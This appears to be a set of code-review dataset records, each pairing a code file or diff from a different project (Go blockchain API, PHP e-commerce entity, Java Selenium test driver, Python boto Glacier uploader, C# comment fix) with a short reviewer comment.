BlockMetaByHash returns blockmeta response by block hash func (core *coreService) BlockMetaByHash(blkHash string) (*iotextypes.BlockMeta, error) { hash, err := hash.HexStringToHash256(blkHash) if err != nil { return nil, status.Error(codes.InvalidArgument, err.Error()) } height, err := core.dao.GetBlockHeight(hash) if err != nil { if errors.Cause(err) == db.ErrNotExist { return nil, status.Error(codes.NotFound, err.Error()) } return nil, status.Error(codes.Internal, err.Error()) } return core.getBlockMetaByHeight(height) } // getBlockMetaByHeight gets BlockMeta by height func (core *coreService) getBlockMetaByHeight(height uint64) (*iotextypes.BlockMeta, error) { blk, err := core.dao.GetBlockByHeight(height) if err != nil { return nil, status.Error(codes.NotFound, err.Error()) } // get block's receipt if blk.Height() > 0 { blk.Receipts, err = core.dao.GetReceipts(height) if err != nil { return nil, status.Error(codes.NotFound, err.Error()) } } return generateBlockMeta(blk), nil } // generateBlockMeta generates BlockMeta from block func generateBlockMeta(blk *block.Block) *iotextypes.BlockMeta { header := blk.Header height := header.Height() ts, _ := ptypes.TimestampProto(header.Timestamp()) var ( producerAddress string h hash.Hash256 ) if blk.Height() > 0 { producerAddress = header.ProducerAddress() h = header.HashBlock() } else { h = block.GenesisHash() } txRoot := header.TxRoot() receiptRoot := header.ReceiptRoot() deltaStateDigest := header.DeltaStateDigest() prevHash := header.PrevHash() blockMeta := iotextypes.BlockMeta{ Hash: hex.EncodeToString(h[:]), Height: height, Timestamp: ts, ProducerAddress: producerAddress, TxRoot: hex.EncodeToString(txRoot[:]), ReceiptRoot: hex.EncodeToString(receiptRoot[:]), DeltaStateDigest: hex.EncodeToString(deltaStateDigest[:]), PreviousBlockHash: hex.EncodeToString(prevHash[:]), } if logsBloom := header.LogsBloomfilter(); logsBloom != nil { blockMeta.LogsBloom = hex.EncodeToString(logsBloom.Bytes()) } blockMeta.NumActions = int64(len(blk.Actions)) blockMeta.TransferAmount = blk.CalculateTransferAmount().String() blockMeta.GasLimit, blockMeta.GasUsed = gasLimitAndUsed(blk) return &blockMeta } // GasLimitAndUsed returns the gas limit and used in a block func gasLimitAndUsed(b *block.Block) (uint64, uint64) { var gasLimit, gasUsed uint64 for _, tx := range b.Actions { gasLimit += tx.GasLimit() } for _, r := range b.Receipts { gasUsed += r.GasConsumed } return gasLimit, gasUsed } func (core *coreService) getGravityChainStartHeight(epochHeight uint64) (uint64, error) { gravityChainStartHeight := epochHeight if pp := poll.FindProtocol(core.registry); pp != nil { methodName := []byte("GetGravityChainStartHeight") arguments := [][]byte{[]byte(strconv.FormatUint(epochHeight, 10))} data, _, err := core.readState(context.Background(), pp, "", methodName, arguments...) if err != nil { return 0, err } if len(data) == 0 { return 0, nil } if gravityChainStartHeight, err = strconv.ParseUint(string(data), 10, 64); err != nil { return 0, err } } return gravityChainStartHeight, nil } func (core *coreService) committedAction(selp action.SealedEnvelope, blkHash hash.Hash256, blkHeight uint64) (*iotexapi.ActionInfo, error) { actHash, err := selp.Hash() if err != nil { return nil, err } header, err := core.dao.Header(blkHash) if err != nil { return nil, err } sender := selp.SrcPubkey().Address() receipt, err := core.dao.GetReceiptByActionHash(actHash, blkHeight) if err != nil { return nil, err } gas := new(big.Int) gas = gas.Mul(selp.GasPrice(), big.NewInt(int64(receipt.GasConsumed))) return &iotexapi.ActionInfo{ Action: selp.Proto(), ActHash: hex.EncodeToString(actHash[:]), BlkHash: hex.EncodeToString(blkHash[:]), BlkHeight: header.Height(), Sender: sender.String(), GasFee: gas.String(), Timestamp: header.BlockHeaderCoreProto().Timestamp, }, nil } func (core *coreService) pendingAction(selp action.SealedEnvelope) (*iotexapi.ActionInfo, error) { actHash, err := selp.Hash() if err != nil { return nil, err } sender := selp.SrcPubkey().Address() return &iotexapi.ActionInfo{ Action: selp.Proto(), ActHash: hex.EncodeToString(actHash[:]), BlkHash: hex.EncodeToString(hash.ZeroHash256[:]), BlkHeight: 0, Sender: sender.String(), Timestamp: nil, Index: 0, }, nil } func (core *coreService) getAction(actHash hash.Hash256, checkPending bool) (*iotexapi.ActionInfo, error) { selp, blkHash, blkHeight, actIndex, err := core.getActionByActionHash(actHash) if err == nil { act, err := core.committedAction(selp, blkHash, blkHeight) if err != nil { return nil, err } act.Index = actIndex return act, nil } // Try to fetch pending action from actpool if checkPending { selp, err = core.ap.GetActionByHash(actHash) } if err != nil { return nil, err } return core.pendingAction(selp) } func (core *coreService) actionsInBlock(blk *block.Block, start, count uint64) []*iotexapi.ActionInfo { var res []*iotexapi.ActionInfo if len(blk.Actions) == 0 || start >= uint64(len(blk.Actions)) { return res } h := blk.HashBlock() blkHash := hex.EncodeToString(h[:]) blkHeight := blk.Height() ts := blk.Header.BlockHeaderCoreProto().Timestamp lastAction := start + count if count == math.MaxUint64 { // count = -1 means to get all actions lastAction = uint64(len(blk.Actions)) } else { if lastAction >= uint64(len(blk.Actions)) { lastAction = uint64(len(blk.Actions)) } } for i := start; i < lastAction; i++ { selp := blk.Actions[i] actHash, err := selp.Hash() if err != nil { log.L().Debug("Skipping action due to hash error", zap.Error(err)) continue } sender := selp.SrcPubkey().Address() res = append(res, &iotexapi.ActionInfo{ Action: selp.Proto(), ActHash: hex.EncodeToString(actHash[:]), BlkHash: blkHash, Timestamp: ts, BlkHeight: blkHeight, Sender: sender.String(), Index: uint32(i), }) } return res } func (core *coreService) reverseActionsInBlock(blk *block.Block, reverseStart, count uint64) []*iotexapi.ActionInfo { h := blk.HashBlock() blkHash := hex.EncodeToString(h[:]) blkHeight := blk.Height() ts := blk.Header.BlockHeaderCoreProto().Timestamp var res []*iotexapi.ActionInfo for i := reverseStart; i < uint64(len(blk.Actions)) && i < reverseStart+count; i++ { ri := uint64(len(blk.Actions)) - 1 - i selp := blk.Actions[ri] actHash, err := selp.Hash() if err != nil { log.L().Debug("Skipping action due to hash error", zap.Error(err)) continue } sender := selp.SrcPubkey().Address() res = append([]*iotexapi.ActionInfo{{ Action: selp.Proto(), ActHash: hex.EncodeToString(actHash[:]), BlkHash: blkHash, Timestamp: ts, BlkHeight: blkHeight, Sender: sender.String(), Index: uint32(ri), }}, res...) } return res } func (core *coreService) getLogsInBlock(filter *logfilter.LogFilter, blockNumber uint64) ([]*iotextypes.Log, error) { logBloomFilter, err := core.bfIndexer.BlockFilterByHeight(blockNumber) if err != nil { return nil, status.Error(codes.InvalidArgument, err.Error()) } if !filter.ExistInBloomFilterv2(logBloomFilter) { return nil, nil } receipts, err := core.dao.GetReceipts(blockNumber) if err != nil { return nil, status.Error(codes.InvalidArgument, err.Error()) } h, err := core.dao.GetBlockHash(blockNumber) if err != nil { return nil, status.Error(codes.InvalidArgument, err.Error()) } return filter.MatchLogs(receipts, h), nil } // TODO: improve using goroutine func (core *coreService) getLogsInRange(filter *logfilter.LogFilter, start, end, paginationSize uint64) ([]*iotextypes.Log, error) { if start > end { return nil, errors.New("invalid start and end height") } if start == 0 { start = 1 } logs := []*iotextypes.Log{} // getLogs via range Blooom filter [start, end] blockNumbers, err := core.bfIndexer.FilterBlocksInRange(filter, start, end) if err != nil { return nil, err } for _, i := range blockNumbers { logsInBlock, err := core.getLogsInBlock(filter, i) if err != nil { return nil, err } for _, log := range logsInBlock { logs = append(logs, log) if len(logs) >= int(paginationSize) { return logs, nil } } } return logs, nil } func (core *coreService) estimateActionGasConsumptionForExecution(ctx context.Context, exec *iotextypes.Execution, sender string) (uint64, error) { sc := &action.Execution{} if err := sc.LoadProto(exec); err != nil { return 0, status.Error(codes.InvalidArgument, err.Error()) } addr, err := address.FromString(sender) if err != nil { return 0, status.Error(codes.FailedPrecondition, err.Error()) } state, err := accountutil.AccountState(core.sf, addr) if err != nil { return 0, status.Error(codes.InvalidArgument, err.Error()) } nonce := state.Nonce + 1 callerAddr, err := address.FromString(sender) if err != nil { return 0, status.Error(codes.InvalidArgument, err.Error()) } enough, receipt, err := core.isGasLimitEnough(ctx, callerAddr, sc, nonce, core.cfg.Genesis.BlockGasLimit) if err != nil { return 0, status.Error(codes.Internal, err.Error()) } if !enough { if receipt.ExecutionRevertMsg() != "" { return 0, status.Errorf(codes.Internal, fmt.Sprintf("execution simulation is reverted due to the reason: %s", receipt.ExecutionRevertMsg())) } return 0, status.Error(codes.Internal, fmt.Sprintf("execution simulation failed: status = %d", receipt.Status)) } estimatedGas := receipt.GasConsumed enough, _, err = core.isGasLimitEnough(ctx, callerAddr, sc, nonce, estimatedGas) if err != nil && err != action.ErrInsufficientFunds { return 0, status.Error(codes.Internal, err.Error()) } if !enough { low, high := estimatedGas, core.cfg.Genesis.BlockGasLimit estimatedGas = high for low <= high { mid := (low + high) / 2 enough, _, err = core.isGasLimitEnough(ctx, callerAddr, sc, nonce, mid) if err != nil && err != action.ErrInsufficientFunds { return 0, status.Error(codes.Internal, err.Error()) } if enough { estimatedGas = mid high = mid - 1 } else { low = mid + 1 } } } return estimatedGas, nil } func (core *coreService) isGasLimitEnough( ctx context.Context, caller address.Address, sc *action.Execution, nonce uint64, gasLimit uint64, ) (bool, *action.Receipt, error) { ctx, span := tracer.NewSpan(ctx, "Server.isGasLimitEnough") defer span.End() sc, _ = action.NewExecution( sc.Contract(), nonce, sc.Amount(), gasLimit, big.NewInt(0), sc.Data(), ) ctx, err := core.bc.Context(ctx) if err != nil { return false, nil, err } _, receipt, err := core.sf.SimulateExecution(ctx, caller, sc, core.dao.GetBlockHash) if err != nil { return false, nil, err } return receipt.Status == uint64(iotextypes.ReceiptStatus_Success), receipt, nil } func (core *coreService) getProductivityByEpoch( rp *rolldpos.Protocol, epochNum uint64, tipHeight uint64, abps state.CandidateList, ) (uint64, map[string]uint64, error) { num, produce, err := rp.ProductivityByEpoch(epochNum, tipHeight, func(start uint64, end uint64) (map[string]uint64, error) { return blockchain.Productivity(core.bc, start, end) }) if err != nil { return 0, nil, status.Error(codes.NotFound, err.Error()) } // check if there is any active block producer who didn't prodcue any block for _, abp := range abps { if _, ok := produce[abp.Address]; !ok { produce[abp.Address] = 0 } } return num, produce, nil } func (core *coreService) getProtocolAccount(ctx context.Context, addr string) (*iotextypes.AccountMeta, *iotextypes.BlockIdentifier, error) { var ( balance string out *iotexapi.ReadStateResponse err error ) switch addr { case address.RewardingPoolAddr: if out, err = core.ReadState("rewarding", "", []byte("TotalBalance"), nil); err != nil { return nil, nil, err } val, ok := big.NewInt(0).SetString(string(out.GetData()), 10) if !ok { return nil, nil, errors.New("balance convert error") } balance = val.String() case address.StakingBucketPoolAddr: methodName, err := proto.Marshal(&iotexapi.ReadStakingDataMethod{ Method: iotexapi.ReadStakingDataMethod_TOTAL_STAKING_AMOUNT, }) if err != nil { return nil, nil, err } arg, err := proto.Marshal(&iotexapi.ReadStakingDataRequest{ Request: &iotexapi.ReadStakingDataRequest_TotalStakingAmount_{ TotalStakingAmount: &iotexapi.ReadStakingDataRequest_TotalStakingAmount{}, }, }) if err != nil { return nil, nil, err } if out, err = core.ReadState("staking", "", methodName, [][]byte{arg}); err != nil { return nil, nil, err } acc := iotextypes.AccountMeta{} if err := proto.Unmarshal(out.GetData(), &acc); err != nil { return nil, nil, errors.Wrap(err, "failed to unmarshal account meta") } balance = acc.GetBalance() default: return nil, nil, errors.Errorf("invalid address %s", addr) } return &iotextypes.AccountMeta{ Address: addr, Balance: balance, }, out.GetBlockIdentifier(), nil } // ActPoolActions returns the all Transaction Identifiers in the mempool func (core *coreService) ActPoolActions(actHashes []string) ([]*iotextypes.Action, error) { var ret []*iotextypes.Action if len(actHashes) == 0 { for _, sealeds := range core.ap.PendingActionMap() { for _, sealed := range sealeds { ret = append(ret, sealed.Proto()) } } return ret, nil } for _, hashStr := range actHashes { hs, err := hash.HexStringToHash256(hashStr) if err != nil { return nil, status.Error(codes.InvalidArgument, errors.Wrap(err, "failed to hex string to hash256").Error()) } sealed, err := core.ap.GetActionByHash(hs) if err != nil { return nil, status.Error(codes.NotFound, err.Error()) } ret = append(ret, sealed.Proto()) } return ret, nil } // EVMNetworkID returns the network id of evm func (core *coreService) EVMNetworkID() uint32 { return config.EVMNetworkID() } // ChainID returns the chain id of evm func (core *coreService) ChainID() uint32 { return core.bc.ChainID() } // GetActionByActionHash returns action by action hash func (core *coreService) ActionByActionHash(h hash.Hash256) (action.SealedEnvelope, error) { if !core.hasActionIndex || core.indexer == nil { return action.SealedEnvelope{}, status.Error(codes.NotFound, blockindex.ErrActionIndexNA.Error()) } selp, _, _, _, err := core.getActionByActionHash(h) return selp, err } // ReadContractStorage reads contract's storage func (core *coreService) ReadContractStorage(ctx context.Context, addr address.Address, key []byte) ([]byte, error) { ctx, err := core.bc.Context(ctx) if err != nil { return nil, status.Error(codes.Internal, err.Error()) } return core.sf.ReadContractStorage(ctx, addr, key) }
1
24,415
let's keep ActionByActionHash and delete getActionByActionHash
iotexproject-iotex-core
go
@@ -64,4 +64,12 @@ class ProductVisibility { return $this->visible; } + + /** + * @return \Shopsys\FrameworkBundle\Model\Pricing\Group\PricingGroup + */ + public function getPricingGroup(): PricingGroup + { + return $this->pricingGroup; + } }
1
<?php namespace Shopsys\FrameworkBundle\Model\Product; use Doctrine\ORM\Mapping as ORM; use Shopsys\FrameworkBundle\Model\Pricing\Group\PricingGroup; /** * @ORM\Table(name="product_visibilities") * @ORM\Entity */ class ProductVisibility { /** * @var \Shopsys\FrameworkBundle\Model\Product\Product * * @ORM\Id * @ORM\ManyToOne(targetEntity="Shopsys\FrameworkBundle\Model\Product\Product") * @ORM\JoinColumn(nullable=false, name="product_id", referencedColumnName="id", onDelete="CASCADE") */ protected $product; /** * @var \Shopsys\FrameworkBundle\Model\Pricing\Group\PricingGroup * * @ORM\Id * @ORM\ManyToOne(targetEntity="Shopsys\FrameworkBundle\Model\Pricing\Group\PricingGroup") * @ORM\JoinColumn(nullable=false, name="pricing_group_id", referencedColumnName="id", onDelete="CASCADE") */ protected $pricingGroup; /** * @var int * * @ORM\Id * @ORM\Column(type="integer") */ protected $domainId; /** * @var bool * * @ORM\Column(type="boolean") */ protected $visible; /** * @param \Shopsys\FrameworkBundle\Model\Product\Product $product * @param \Shopsys\FrameworkBundle\Model\Pricing\Group\PricingGroup $pricingGroup * @param int $domainId */ public function __construct( Product $product, PricingGroup $pricingGroup, $domainId ) { $this->product = $product; $this->pricingGroup = $pricingGroup; $this->domainId = $domainId; $this->visible = false; } public function isVisible() { return $this->visible; } }
1
16,921
please use return type
shopsys-shopsys
php
@@ -76,7 +76,7 @@ public class TestEdgeDriver extends RemoteWebDriver implements WebStorage, Locat .findFirst().orElseThrow(WebDriverException::new); service = (EdgeDriverService) builder.withVerbose(true).withLogFile(logFile.toFile()).build(); - LOG.info("edgedriver will log to " + logFile); + LOG.fine("edgedriver will log to " + logFile); service.start(); Runtime.getRuntime().addShutdownHook(new Thread(() -> service.stop())); }
1
// Licensed to the Software Freedom Conservancy (SFC) under one // or more contributor license agreements. See the NOTICE file // distributed with this work for additional information // regarding copyright ownership. The SFC licenses this file // to you under the Apache License, Version 2.0 (the // "License"); you may not use this file except in compliance // with the License. You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, // software distributed under the License is distributed on an // "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY // KIND, either express or implied. See the License for the // specific language governing permissions and limitations // under the License. package org.openqa.selenium.testing.drivers; import org.openqa.selenium.Capabilities; import org.openqa.selenium.OutputType; import org.openqa.selenium.WebDriverException; import org.openqa.selenium.edge.EdgeDriverService; import org.openqa.selenium.edge.EdgeOptions; import org.openqa.selenium.html5.LocalStorage; import org.openqa.selenium.html5.Location; import org.openqa.selenium.html5.LocationContext; import org.openqa.selenium.html5.SessionStorage; import org.openqa.selenium.html5.WebStorage; import org.openqa.selenium.remote.DriverCommand; import org.openqa.selenium.remote.RemoteWebDriver; import org.openqa.selenium.remote.html5.RemoteLocationContext; import org.openqa.selenium.remote.html5.RemoteWebStorage; import org.openqa.selenium.remote.service.DriverService; import java.io.File; import java.io.IOException; import java.net.URL; import java.nio.file.Files; import java.nio.file.Path; import java.util.HashMap; import java.util.Map; import java.util.ServiceLoader; import java.util.logging.Logger; import java.util.stream.StreamSupport; /** * Customized RemoteWebDriver that will communicate with a service that lives and dies with the * entire test suite. We do not use {@link org.openqa.selenium.edge.EdgeDriver} since that starts and stops the service * with each instance (and that is too expensive for our purposes). */ public class TestEdgeDriver extends RemoteWebDriver implements WebStorage, LocationContext { private final static Logger LOG = Logger.getLogger(TestEdgeDriver.class.getName()); private static EdgeDriverService service; private RemoteWebStorage webStorage; private RemoteLocationContext locationContext; public TestEdgeDriver(Capabilities capabilities) { super(getServiceUrl(), edgeWithCustomCapabilities(capabilities)); webStorage = new RemoteWebStorage(getExecuteMethod()); locationContext = new RemoteLocationContext(getExecuteMethod()); } private static URL getServiceUrl() { try { if (service == null) { Path logFile = Files.createTempFile("edgedriver", ".log"); boolean isLegacy = System.getProperty("webdriver.edge.edgehtml") == null || Boolean.getBoolean("webdriver.edge.edgehtml"); EdgeDriverService.Builder<?, ?> builder = StreamSupport.stream(ServiceLoader.load(DriverService.Builder.class).spliterator(), false) .filter(b -> b instanceof EdgeDriverService.Builder) .map(b -> (EdgeDriverService.Builder<?, ?>) b) .filter(b -> b.isLegacy() == isLegacy) .findFirst().orElseThrow(WebDriverException::new); service = (EdgeDriverService) builder.withVerbose(true).withLogFile(logFile.toFile()).build(); LOG.info("edgedriver will log to " + logFile); service.start(); Runtime.getRuntime().addShutdownHook(new Thread(() -> service.stop())); } return service.getUrl(); } catch (IOException e) { throw new RuntimeException(e); } } private static Capabilities edgeWithCustomCapabilities(Capabilities originalCapabilities) { EdgeOptions options = new EdgeOptions(); if (System.getProperty("webdriver.edge.edgehtml") == null || Boolean.getBoolean("webdriver.edge.edgehtml")) return options; options.addArguments("disable-extensions", "disable-infobars", "disable-breakpad"); Map<String, Object> prefs = new HashMap<>(); prefs.put("exit_type", "None"); prefs.put("exited_cleanly", true); options.setExperimentalOption("prefs", prefs); String edgePath = System.getProperty("webdriver.edge.binary"); if (edgePath != null) { options.setBinary(new File(edgePath)); } if (originalCapabilities != null) { options.merge(originalCapabilities); } return options; } @Override public <X> X getScreenshotAs(OutputType<X> target) { // Get the screenshot as base64. String base64 = (String) execute(DriverCommand.SCREENSHOT).getValue(); // ... and convert it. return target.convertFromBase64Png(base64); } @Override public LocalStorage getLocalStorage() { return webStorage.getLocalStorage(); } @Override public SessionStorage getSessionStorage() { return webStorage.getSessionStorage(); } @Override public Location location() { return locationContext.location(); } @Override public void setLocation(Location location) { locationContext.setLocation(location); } }
1
17,118
This is deliberately at this level.
SeleniumHQ-selenium
java
@@ -237,7 +237,7 @@ class UploadWorkerThread(TransferThread): except self._retry_exceptions as e: log.error("Exception caught uploading part number %s for " "vault %s, attempt: (%s / %s), filename: %s, " - "exception: %s, msg: %s", + "exception: %s as msg: %s", work[0], self._vault_name, i + 1, self._num_retries + 1, self._filename, e.__class__, e) time.sleep(self._time_between_retries)
1
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. # import os import math import threading import hashlib import time import logging from boto.compat import Queue import binascii from boto.glacier.utils import DEFAULT_PART_SIZE, minimum_part_size, \ chunk_hashes, tree_hash, bytes_to_hex from boto.glacier.exceptions import UploadArchiveError, \ DownloadArchiveError, \ TreeHashDoesNotMatchError _END_SENTINEL = object() log = logging.getLogger('boto.glacier.concurrent') class ConcurrentTransferer(object): def __init__(self, part_size=DEFAULT_PART_SIZE, num_threads=10): self._part_size = part_size self._num_threads = num_threads self._threads = [] def _calculate_required_part_size(self, total_size): min_part_size_required = minimum_part_size(total_size) if self._part_size >= min_part_size_required: part_size = self._part_size else: part_size = min_part_size_required log.debug("The part size specified (%s) is smaller than " "the minimum required part size. Using a part " "size of: %s", self._part_size, part_size) total_parts = int(math.ceil(total_size / float(part_size))) return total_parts, part_size def _shutdown_threads(self): log.debug("Shutting down threads.") for thread in self._threads: thread.should_continue = False for thread in self._threads: thread.join() log.debug("Threads have exited.") def _add_work_items_to_queue(self, total_parts, worker_queue, part_size): log.debug("Adding work items to queue.") for i in range(total_parts): worker_queue.put((i, part_size)) for i in range(self._num_threads): worker_queue.put(_END_SENTINEL) class ConcurrentUploader(ConcurrentTransferer): """Concurrently upload an archive to glacier. This class uses a thread pool to concurrently upload an archive to glacier using the multipart upload API. The threadpool is completely managed by this class and is transparent to the users of this class. """ def __init__(self, api, vault_name, part_size=DEFAULT_PART_SIZE, num_threads=10): """ :type api: :class:`boto.glacier.layer1.Layer1` :param api: A layer1 glacier object. :type vault_name: str :param vault_name: The name of the vault. :type part_size: int :param part_size: The size, in bytes, of the chunks to use when uploading the archive parts. The part size must be a megabyte multiplied by a power of two. :type num_threads: int :param num_threads: The number of threads to spawn for the thread pool. The number of threads will control how much parts are being concurrently uploaded. """ super(ConcurrentUploader, self).__init__(part_size, num_threads) self._api = api self._vault_name = vault_name def upload(self, filename, description=None): """Concurrently create an archive. The part_size value specified when the class was constructed will be used *unless* it is smaller than the minimum required part size needed for the size of the given file. In that case, the part size used will be the minimum part size required to properly upload the given file. :type file: str :param file: The filename to upload :type description: str :param description: The description of the archive. :rtype: str :return: The archive id of the newly created archive. """ total_size = os.stat(filename).st_size total_parts, part_size = self._calculate_required_part_size(total_size) hash_chunks = [None] * total_parts worker_queue = Queue() result_queue = Queue() response = self._api.initiate_multipart_upload(self._vault_name, part_size, description) upload_id = response['UploadId'] # The basic idea is to add the chunks (the offsets not the actual # contents) to a work queue, start up a thread pool, let the crank # through the items in the work queue, and then place their results # in a result queue which we use to complete the multipart upload. self._add_work_items_to_queue(total_parts, worker_queue, part_size) self._start_upload_threads(result_queue, upload_id, worker_queue, filename) try: self._wait_for_upload_threads(hash_chunks, result_queue, total_parts) except UploadArchiveError as e: log.debug("An error occurred while uploading an archive, " "aborting multipart upload.") self._api.abort_multipart_upload(self._vault_name, upload_id) raise e log.debug("Completing upload.") response = self._api.complete_multipart_upload( self._vault_name, upload_id, bytes_to_hex(tree_hash(hash_chunks)), total_size) log.debug("Upload finished.") return response['ArchiveId'] def _wait_for_upload_threads(self, hash_chunks, result_queue, total_parts): for _ in range(total_parts): result = result_queue.get() if isinstance(result, Exception): log.debug("An error was found in the result queue, terminating " "threads: %s", result) self._shutdown_threads() raise UploadArchiveError("An error occurred while uploading " "an archive: %s" % result) # Each unit of work returns the tree hash for the given part # number, which we use at the end to compute the tree hash of # the entire archive. part_number, tree_sha256 = result hash_chunks[part_number] = tree_sha256 self._shutdown_threads() def _start_upload_threads(self, result_queue, upload_id, worker_queue, filename): log.debug("Starting threads.") for _ in range(self._num_threads): thread = UploadWorkerThread(self._api, self._vault_name, filename, upload_id, worker_queue, result_queue) time.sleep(0.2) thread.start() self._threads.append(thread) class TransferThread(threading.Thread): def __init__(self, worker_queue, result_queue): super(TransferThread, self).__init__() self._worker_queue = worker_queue self._result_queue = result_queue # This value can be set externally by other objects # to indicate that the thread should be shut down. self.should_continue = True def run(self): while self.should_continue: try: work = self._worker_queue.get(timeout=1) except Empty: continue if work is _END_SENTINEL: self._cleanup() return result = self._process_chunk(work) self._result_queue.put(result) self._cleanup() def _process_chunk(self, work): pass def _cleanup(self): pass class UploadWorkerThread(TransferThread): def __init__(self, api, vault_name, filename, upload_id, worker_queue, result_queue, num_retries=5, time_between_retries=5, retry_exceptions=Exception): super(UploadWorkerThread, self).__init__(worker_queue, result_queue) self._api = api self._vault_name = vault_name self._filename = filename self._fileobj = open(filename, 'rb') self._upload_id = upload_id self._num_retries = num_retries self._time_between_retries = time_between_retries self._retry_exceptions = retry_exceptions def _process_chunk(self, work): result = None for i in range(self._num_retries + 1): try: result = self._upload_chunk(work) break except self._retry_exceptions as e: log.error("Exception caught uploading part number %s for " "vault %s, attempt: (%s / %s), filename: %s, " "exception: %s, msg: %s", work[0], self._vault_name, i + 1, self._num_retries + 1, self._filename, e.__class__, e) time.sleep(self._time_between_retries) result = e return result def _upload_chunk(self, work): part_number, part_size = work start_byte = part_number * part_size self._fileobj.seek(start_byte) contents = self._fileobj.read(part_size) linear_hash = hashlib.sha256(contents).hexdigest() tree_hash_bytes = tree_hash(chunk_hashes(contents)) byte_range = (start_byte, start_byte + len(contents) - 1) log.debug("Uploading chunk %s of size %s", part_number, part_size) response = self._api.upload_part(self._vault_name, self._upload_id, linear_hash, bytes_to_hex(tree_hash_bytes), byte_range, contents) # Reading the response allows the connection to be reused. response.read() return (part_number, tree_hash_bytes) def _cleanup(self): self._fileobj.close() class ConcurrentDownloader(ConcurrentTransferer): """ Concurrently download an archive from glacier. This class uses a thread pool to concurrently download an archive from glacier. The threadpool is completely managed by this class and is transparent to the users of this class. """ def __init__(self, job, part_size=DEFAULT_PART_SIZE, num_threads=10): """ :param job: A layer2 job object for archive retrieval object. :param part_size: The size, in bytes, of the chunks to use when uploading the archive parts. The part size must be a megabyte multiplied by a power of two. """ super(ConcurrentDownloader, self).__init__(part_size, num_threads) self._job = job def download(self, filename): """ Concurrently download an archive. :param filename: The filename to download the archive to :type filename: str """ total_size = self._job.archive_size total_parts, part_size = self._calculate_required_part_size(total_size) worker_queue = Queue() result_queue = Queue() self._add_work_items_to_queue(total_parts, worker_queue, part_size) self._start_download_threads(result_queue, worker_queue) try: self._wait_for_download_threads(filename, result_queue, total_parts) except DownloadArchiveError as e: log.debug("An error occurred while downloading an archive: %s", e) raise e log.debug("Download completed.") def _wait_for_download_threads(self, filename, result_queue, total_parts): """ Waits until the result_queue is filled with all the downloaded parts This indicates that all part downloads have completed Saves downloaded parts into filename :param filename: :param result_queue: :param total_parts: """ hash_chunks = [None] * total_parts with open(filename, "wb") as f: for _ in range(total_parts): result = result_queue.get() if isinstance(result, Exception): log.debug("An error was found in the result queue, " "terminating threads: %s", result) self._shutdown_threads() raise DownloadArchiveError( "An error occurred while uploading " "an archive: %s" % result) part_number, part_size, actual_hash, data = result hash_chunks[part_number] = actual_hash start_byte = part_number * part_size f.seek(start_byte) f.write(data) f.flush() final_hash = bytes_to_hex(tree_hash(hash_chunks)) log.debug("Verifying final tree hash of archive, expecting: %s, " "actual: %s", self._job.sha256_treehash, final_hash) if self._job.sha256_treehash != final_hash: self._shutdown_threads() raise TreeHashDoesNotMatchError( "Tree hash for entire archive does not match, " "expected: %s, got: %s" % (self._job.sha256_treehash, final_hash)) self._shutdown_threads() def _start_download_threads(self, result_queue, worker_queue): log.debug("Starting threads.") for _ in range(self._num_threads): thread = DownloadWorkerThread(self._job, worker_queue, result_queue) time.sleep(0.2) thread.start() self._threads.append(thread) class DownloadWorkerThread(TransferThread): def __init__(self, job, worker_queue, result_queue, num_retries=5, time_between_retries=5, retry_exceptions=Exception): """ Individual download thread that will download parts of the file from Glacier. Parts to download stored in work queue. Parts download to a temp dir with each part a separate file :param job: Glacier job object :param work_queue: A queue of tuples which include the part_number and part_size :param result_queue: A priority queue of tuples which include the part_number and the path to the temp file that holds that part's data. """ super(DownloadWorkerThread, self).__init__(worker_queue, result_queue) self._job = job self._num_retries = num_retries self._time_between_retries = time_between_retries self._retry_exceptions = retry_exceptions def _process_chunk(self, work): """ Attempt to download a part of the archive from Glacier Store the result in the result_queue :param work: """ result = None for _ in range(self._num_retries): try: result = self._download_chunk(work) break except self._retry_exceptions as e: log.error("Exception caught downloading part number %s for " "job %s", work[0], self._job,) time.sleep(self._time_between_retries) result = e return result def _download_chunk(self, work): """ Downloads a chunk of archive from Glacier. Saves the data to a temp file Returns the part number and temp file location :param work: """ part_number, part_size = work start_byte = part_number * part_size byte_range = (start_byte, start_byte + part_size - 1) log.debug("Downloading chunk %s of size %s", part_number, part_size) response = self._job.get_output(byte_range) data = response.read() actual_hash = bytes_to_hex(tree_hash(chunk_hashes(data))) if response['TreeHash'] != actual_hash: raise TreeHashDoesNotMatchError( "Tree hash for part number %s does not match, " "expected: %s, got: %s" % (part_number, response['TreeHash'], actual_hash)) return (part_number, part_size, binascii.unhexlify(actual_hash), data)
1
11,661
I'm going to go ahead and undo this change, I don't think it was intentional.
boto-boto
py
@@ -163,7 +163,7 @@ namespace Datadog.AutoInstrumentation.ManagedLoader /// As a result, the target framework moniker and the binary compatibility flags are initialized correctly. /// </summary> /// <remarks> - /// The above logic is further specialised, depending on the kind of the currnent AppDomain and where the app is hosted: + /// The above logic is further specialized, depending on the kind of the current AppDomain and where the app is hosted: /// <br /> /// * On non-default AD: /// we do not wait.
1
